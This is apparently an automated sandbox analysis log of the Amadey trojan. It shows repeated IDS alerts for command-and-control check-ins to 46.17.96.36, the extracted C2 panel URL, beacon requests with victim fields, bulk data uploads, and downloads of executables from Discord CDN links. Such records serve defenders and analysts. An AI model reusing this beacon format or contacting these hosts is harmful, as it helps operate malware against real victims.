              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49927 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49946 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49954 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49959 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49975 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49978 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49984 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49987 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49996 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49999 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50004 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50009 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50016 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50018 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50024 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50026 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50038 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50045 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50047 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50051 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50055 -> 46.17.96.36:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 46.17.96.36:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: 46.17.96.36/k8FppT/index.php
              Source: Joe Sandbox ViewASN Name: HOSTKEY-ASNL HOSTKEY-ASNL
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: GET /attachments/880877737378734114/880877786884112404/1sb1iwyem7.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----699541f833ca8faa1bd26fe17facb267Host: 46.17.96.36Content-Length: 107110Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----699541f833ca8faa1bd26fe17facb267Host: 46.17.96.36Content-Length: 107110Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c40968ed499c6f5938534922f4d89073Host: 46.17.96.36Content-Length: 107710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6c877eb2a3da7264dec94b69baff2e36Host: 46.17.96.36Content-Length: 107432Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000003001&unit=152138533219
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----9af1e57389b70ac42b360f895ff149c0Host: 46.17.96.36Content-Length: 108322Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----18482e8eccd3978e1e99c57ecdc4fd2fHost: 46.17.96.36Content-Length: 109159Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c5a841f4f1c49d0b014c71075a2e4e94Host: 46.17.96.36Content-Length: 109415Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----c5a841f4f1c49d0b014c71075a2e4e94Host: 46.17.96.36Content-Length: 109415Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2e97d6ab67dd52d2b0448fb19f95ffa5Host: 46.17.96.36Content-Length: 109366Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0eca12f9569ffde04e01e318ef40cd43Host: 46.17.96.36Content-Length: 109213Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----18482e8eccd3978e1e99c57ecdc4fd2fHost: 46.17.96.36Content-Length: 109159Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0eca12f9569ffde04e01e318ef40cd43Host: 46.17.96.36Content-Length: 109213Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8cHost: 46.17.96.36Content-Length: 108017Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8cHost: 46.17.96.36Content-Length: 108017Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8cHost: 46.17.96.36Content-Length: 108017Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716Host: 46.17.96.36Content-Length: 110651Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db56d3c9a49176ccd92b63c96c9facd8Host: 46.17.96.36Content-Length: 109347Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bf8d5a167ee28da00e24b992931fcac0Host: 46.17.96.36Content-Length: 108282Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9Host: 46.17.96.36Content-Length: 107971Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9Host: 46.17.96.36Content-Length: 110607Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000004001&unit=152138533219
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ce51b85b4f9ae9a3c4604c72e2e1c4b9Host: 46.17.96.36Content-Length: 110607Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
